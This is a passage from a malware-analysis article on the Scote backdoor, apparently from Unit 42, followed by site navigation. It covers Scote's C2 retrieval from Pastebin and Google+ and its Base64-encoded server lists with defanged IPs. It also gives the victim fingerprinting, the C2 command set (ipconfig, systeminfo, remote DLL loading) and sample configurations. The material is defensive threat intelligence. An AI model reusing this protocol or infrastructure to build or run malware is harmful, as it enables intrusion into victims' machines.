The configuration is parsed to determine if there are any connection 'param' parameters provided. In the event that there are, Scote will attempt to download the contents of these URLs via a simple GET request.  
These pastebin URLs contained the following information, IPs have been defanged:  
scout{ 5.175.214\[.\]9:22 5.175.214\[.\]9:23 5.175.214\[.\]9:25 5.175.214\[.\]9:53 5.175.214\[.\]9:6000 5.175.214\[.\]9:80 } elite{ 5.175.214\[.\]9:5000 5.175.214\[.\]9:443 5.175.214\[.\]9:1434 5.175.214\[.\]9:110 5.175.214\[.\]9:2716 5.175.214\[.\]9:8080 } {x=c2NvdXR7DQo1LjE3NS4yMTQuOToyMg0KNS4xNzUuMjE0Ljk6MjMNCn0NCmVsaXRlew0KNS4xNzUuMjE0Ljk6NTAwMA0KNS4xNzUuMjE0Ljk6NDQzDQp9}

|-------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | scout{ 5.175.214\[.\]9:22 5.175.214\[.\]9:23 5.175.214\[.\]9:25 5.175.214\[.\]9:53 5.175.214\[.\]9:6000 5.175.214\[.\]9:80 } elite{ 5.175.214\[.\]9:5000 5.175.214\[.\]9:443 5.175.214\[.\]9:1434 5.175.214\[.\]9:110 5.175.214\[.\]9:2716 5.175.214\[.\]9:8080 } {x=c2NvdXR7DQo1LjE3NS4yMTQuOToyMg0KNS4xNzUuMjE0Ljk6MjMNCn0NCmVsaXRlew0KNS4xNzUuMjE0Ljk6NTAwMA0KNS4xNzUuMjE0Ljk6NDQzDQp9} |

In addition to Pastebin, some samples were found connecting to the following three Google+ profiles:

* https://plus.google\[.\]com/104518099222750189969
* https://plus.google\[.\]com/110228699051788231047
* https://plus.google\[.\]com/106456556287604120942

Scote takes the response from these requests and parses data within 'scout{}'. Other Scote versions attempted to identify data contained within '{x=' and '}'. This data is decoded using the traditional Base64 algorithm. The results are similar to the following (IPs have been defanged):  
scout{ 5.175.214\[.\]9:22 5.175.214\[.\]9:23 } elite{ 5.175.214\[.\]9:5000 5.175.214\[.\]9:443 }

|-----------------|--------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 | scout{ 5.175.214\[.\]9:22 5.175.214\[.\]9:23 } elite{ 5.175.214\[.\]9:5000 5.175.214\[.\]9:443 } |

This information is used for subsequent communication and these values represent the Scote malware's C2.  
While there are a number of other configuration parameters within Scote, the connection params and the nick\_name appear to be the only ones used. It's possible that Scote is still actively being developed and the author has yet to make use of the additional parameters provided within the configuration. A full list of identified Scote configurations may be found within the 'Scote Configurations' appendix.  
Scote checks the current running process against the following list to ensure it is running within one of them:

* svchost.exe
* explorer.exe
* chrome.exe
* firefox.exe
* iexplorer.exe
* opera.exe

Scote makes an ASM call to CPUID with an argument of 1 to query the victim's processor information and features. This information is used to generate a unique 8-character hash for that victim.  
Scote then connects to the previously retrieved C2 servers and sends the following information via TCP:  
command=scote\_connection|hwid=\[8 character hash\]  
In the example above, \[8 character hash\] is replaced with the victim's unique hash. Scote continues to submit the following command periodically and will parse the response:  
command=scote\_ping  
Scote accepts the following five responses:

|-----------------------|-------------------------------------------------------|
| **Command**           | **Description**                                       |
| scote\_pong            | No action taken by Scote                              |
| scote\_drop            | Kill the Scote malware                                |
| scote\_info\_ipconfig   | Return the results of running 'ipconfig'              |
| scote\_info\_systeminfo | Return the results of running 'cmd.exe /C systeminfo' |
| scote\_upgrade         | Accept a DLL from the remote C2 and load it.          |

When Scote returns information in the following format:  
command=\[command\]|buffer=\[data\]  
In the example above, \[command\] is replaced with the command received by the remote C2 server, and \[data\] is replaced with data that has been encoded using both traditional base64 as well as base64 with the nonstandard alphabet.  
Scote Configurations  
4df9488fbdfaf5d05fda65175a6b6e5331c58c967adbe972aa46c64b4fd0b1bb \[config\] \[connection\] \[param\]https://plus.google\[.\]com/104518099222750189969\[/param\] \[param\]https://plus.google\[.\]com/110228699051788231047\[/param\] \[param\]https://plus.google\[.\]com/106456556287604120942\[/param\] \[/connection\] \[install\_name\]Kh237t0P\[/install\_name\] \[nick\_name\]k1et333d\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\] ed9c62f77055a2498aec681b5653240be534595b97a9d11e92371639b0ca9a48 \[config\] \[connection\] \[param\]https://plus.google\[.\]com/104518099222750189969\[/param\] \[param\]https://plus.google\[.\]com/110228699051788231047\[/param\] \[param\]https://plus.google\[.\]com/106456556287604120942\[/param\] \[/connection\] \[install\_name\]Q2xm5ziY\[/install\_name\] \[nick\_name\]hq5GyQ1D\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup \[task\_startup\]false\[/task\_startup\] \[injection\]false\[/injection\] 613da5f745c281acbffa4375e96394f8c912f58f92afe347e8a1f10fad3489bb \[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[param\]http://pastebin\[.\]com/raw/trZZJTGA\[/param\] \[/connection\] \[install\_name\]e3HGAiPJ\[/install\_name\] \[nick\_name\]4c1h7vLX\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\] 03e2b932c013252fa2eb5e35390f9e21d0ff87e5b1c01683ebce0e8ce9b8d6df \[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[param\]http://pastebin\[.\]com/raw/trZZJTGA\[/param\] \[/connection\] \[install\_name\]i0c9488I\[/install\_name\] \[nick\_name\]7WDyDSog\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\] 0dde9940f7896c2e4fb881dd185c3c3db280a9fd2ac2cb81988f43f5b0f6fcf7 \[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[param\]http://pastebin\[.\]com/raw/trZZJTGA\[/param\] \[/connection\] \[install\_name\]ZVLhWo62\[/install\_name\] \[nick\_name\]b04bc9mK\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\] d0f2d2d7d82c91fe64a64552e0e6200a096230fb6a64a1307928ae33ab2a5bf8 \[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[/connection\] \[install\_name\]9OhcOo03\[/install\_name\] \[nick\_name\]URt7b1zK\[/nick\_name\] \[install\_folder\]temp\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]true\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\] 7b6347093b27174e27228c2fde7d39e02d57315b354461aaf1dee3f0800fdfc3 \[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[/connection\] \[install\_name\]ke6Wox2L\[/install\_name\] \[nick\_name\]3GlWhgi3\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]true\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]explorer\[/injection\_process\]

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 | 4df9488fbdfaf5d05fda65175a6b6e5331c58c967adbe972aa46c64b4fd0b1bb \[config\] \[connection\] \[param\]https://plus.google\[.\]com/104518099222750189969\[/param\] \[param\]https://plus.google\[.\]com/110228699051788231047\[/param\] \[param\]https://plus.google\[.\]com/106456556287604120942\[/param\] \[/connection\] \[install\_name\]Kh237t0P\[/install\_name\] \[nick\_name\]k1et333d\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\] ed9c62f77055a2498aec681b5653240be534595b97a9d11e92371639b0ca9a48 \[config\] \[connection\] \[param\]https://plus.google\[.\]com/104518099222750189969\[/param\] \[param\]https://plus.google\[.\]com/110228699051788231047\[/param\] \[param\]https://plus.google\[.\]com/106456556287604120942\[/param\] \[/connection\] \[install\_name\]Q2xm5ziY\[/install\_name\] \[nick\_name\]hq5GyQ1D\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup \[task\_startup\]false\[/task\_startup\] \[injection\]false\[/injection\] 613da5f745c281acbffa4375e96394f8c912f58f92afe347e8a1f10fad3489bb \[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[param\]http://pastebin\[.\]com/raw/trZZJTGA\[/param\] \[/connection\] \[install\_name\]e3HGAiPJ\[/install\_name\] \[nick\_name\]4c1h7vLX\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\] 03e2b932c013252fa2eb5e35390f9e21d0ff87e5b1c01683ebce0e8ce9b8d6df \[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[param\]http://pastebin\[.\]com/raw/trZZJTGA\[/param\] \[/connection\] \[install\_name\]i0c9488I\[/install\_name\] \[nick\_name\]7WDyDSog\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\] 0dde9940f7896c2e4fb881dd185c3c3db280a9fd2ac2cb81988f43f5b0f6fcf7 \[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[param\]http://pastebin\[.\]com/raw/trZZJTGA\[/param\] \[/connection\] \[install\_name\]ZVLhWo62\[/install\_name\] \[nick\_name\]b04bc9mK\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\] d0f2d2d7d82c91fe64a64552e0e6200a096230fb6a64a1307928ae33ab2a5bf8 \[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[/connection\] \[install\_name\]9OhcOo03\[/install\_name\] \[nick\_name\]URt7b1zK\[/nick\_name\] \[install\_folder\]temp\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]true\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\] 7b6347093b27174e27228c2fde7d39e02d57315b354461aaf1dee3f0800fdfc3 \[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[/connection\] \[install\_name\]ke6Wox2L\[/install\_name\] \[nick\_name\]3GlWhgi3\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]true\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]explorer\[/injection\_process\] |

Back to top

### Tags

* [Core](https://unit42.paloaltonetworks.com/tag/core/ "Core")
* [DustySky](https://unit42.paloaltonetworks.com/tag/dustysky/ "DustySky")
* [Palestinian Territories](https://unit42.paloaltonetworks.com/tag/palestinian-territories/ "Palestinian Territories")
* [Scote](https://unit42.paloaltonetworks.com/tag/scote/ "Scote")
* [TopHat](https://unit42.paloaltonetworks.com/tag/tophat/ "TopHat")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: OilRig uses RGDoor IIS Backdoor on Targets in the Middle East](https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/ "OilRig uses RGDoor IIS Backdoor on Targets in the Middle East")

### Related Articles

* [Downeks and Quasar RAT Used in Recent Targeted Attacks Against Governments](https://unit42.paloaltonetworks.com/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/ "article - table of contents")

## Related Resources

![Pictorial representation of a magnifying glass illuminating a glowing orange circular digital circuit interface on a dark, high-tech background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Myth-Busting_Overview_1920x900-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) September 16, 2026 [#### Atomic macOS (AMOS) Stealer Activity](https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/)

* [MacOS](https://unit42.paloaltonetworks.com/tag/macos/ "macOS")

* [Threat intelligence](https://unit42.paloaltonetworks.com/tag/threat-intelligence/ "threat intelligence")

* [Unit 42](https://unit42.paloaltonetworks.com/tag/unit-42/ "Unit 42")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/ "Atomic macOS (AMOS) Stealer Activity")  
  ![Pictorial representation of post-exploitation identity misuse in SPIFFE/SPIRE. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 10, 2026 [#### The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/)

* [API](https://unit42.paloaltonetworks.com/tag/api/ "API")

* [Cryptographic](https://unit42.paloaltonetworks.com/tag/cryptographic/ "cryptographic")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/ "The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE")  
  ![Pictorial representation of a pay-per-install threat group campaign prodiving infection service for spreading malware. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip, symbolizing data processing and transfer. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Malware_Category_1920x900-6-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 9, 2026 [#### Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/)

* [ARKTunnel](https://unit42.paloaltonetworks.com/tag/arktunnel/ "ARKTunnel")

* [C2](https://unit42.paloaltonetworks.com/tag/c2/ "C2")

* [CL-CRI-1171](https://unit42.paloaltonetworks.com/tag/cl-cri-1171/ "CL-CRI-1171")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/ "Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure")  
  ![Pictorial representation of attackers using AI tools to target Latin American organizations. A vibrant cityscape with silhouettes of numerous people walking along a bustling street. The scene is illuminated by bright urban lights and digital-like particles, creating a dynamic and futuristic atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_768915868-2-1-786x373.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 3, 2026 [#### Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/)

* [Agentic AI](https://unit42.paloaltonetworks.com/tag/agentic-ai/ "Agentic AI")

* [ChatGPT](https://unit42.paloaltonetworks.com/tag/chatgpt/ "ChatGPT")

* [CL-CRI-1131](https://unit42.paloaltonetworks.com/tag/cl-cri-1131/ "CL-CRI-1131")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/ "Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America")  
  ![Pictorial representation of vishing campaigns in Microsoft Teams. A digital image of a skull formed by blue binary code on a black background, with scattered ones and zeros and digital noise, symbolizes how stealthy prompt injection attacks can exploit AI logic to bypass security controls.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/01_Malware_Category_1920x900-5-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 31, 2026 [#### Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/)

* [Cloaked Ursa](https://unit42.paloaltonetworks.com/tag/cloaked-ursa/ "Cloaked Ursa")

* [Entra ID](https://unit42.paloaltonetworks.com/tag/entra-id/ "Entra ID")

* [Microsoft Teams](https://unit42.paloaltonetworks.com/tag/microsoft-teams/ "Microsoft Teams")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/ "Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams")  
  ![Pictorial representation of AI-enabled malware. A vibrant digital interface displaying various icons and graphs, resembling a futuristic network or data analysis dashboard. The scene is illuminated with glowing lights and patterns.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1270203474-2-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 25, 2026 [#### The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/)

* [Backdoor](https://unit42.paloaltonetworks.com/tag/backdoor/ "backdoor")

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [DLL hijacking](https://unit42.paloaltonetworks.com/tag/dll-hijacking/ "DLL hijacking")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/ "The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution")  
  ![Pictorial representation of identity abuse through trusted communication channels. Close-up view of a digital screen displaying a glitched and pixelated image of a skull-like shape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/02_Malware_Category_1920x900-2-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 20, 2026 [#### Identity Abuse Through Trusted Communication Channels](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/)

* [Authentication](https://unit42.paloaltonetworks.com/tag/authentication/ "authentication")

* [Identity theft](https://unit42.paloaltonetworks.com/tag/identity-theft/ "identity theft")

* [Malware](https://unit42.paloaltonetworks.com/tag/malware/ "malware")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/ "Identity Abuse Through Trusted Communication Channels")  
  ![Pictorial representation of Kimwolf botnet malware family. Digital screen with a warning sign reading "Malware." The background features lines of computer code and graphics, creating a sense of cybersecurity threat.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/07_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 11, 2026 [#### Kimwolf v7: An Evolution of the Kimwolf Botnet](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/)

* [Android APK](https://unit42.paloaltonetworks.com/tag/android-apk/ "Android APK")

* [Ethereum](https://unit42.paloaltonetworks.com/tag/ethereum/ "Ethereum")

* [HTTP](https://unit42.paloaltonetworks.com/tag/http/ "HTTP")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/ "Kimwolf v7: An Evolution of the Kimwolf Botnet")  
  ![Pictorial representatiom pf Aeternum's blockchain C2. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/04_Malware_Category_1920x900-4-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 10, 2026 [#### The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/)

* [Aeternum](https://unit42.paloaltonetworks.com/tag/aeternum/ "Aeternum")

* [Infection chain](https://unit42.paloaltonetworks.com/tag/infection-chain/ "infection chain")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/ "The Permanent Threat: Analyzing Aeternum’s Blockchain-Based C2 Operations and Communications")  
  ![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) August 6, 2026 [#### ChainDrop: Inside a Self-Propagating npm Worm](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/tag/blockchain/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/tag/claude-code/ "Claude code")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/ "ChainDrop: Inside a Self-Propagating npm Worm")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

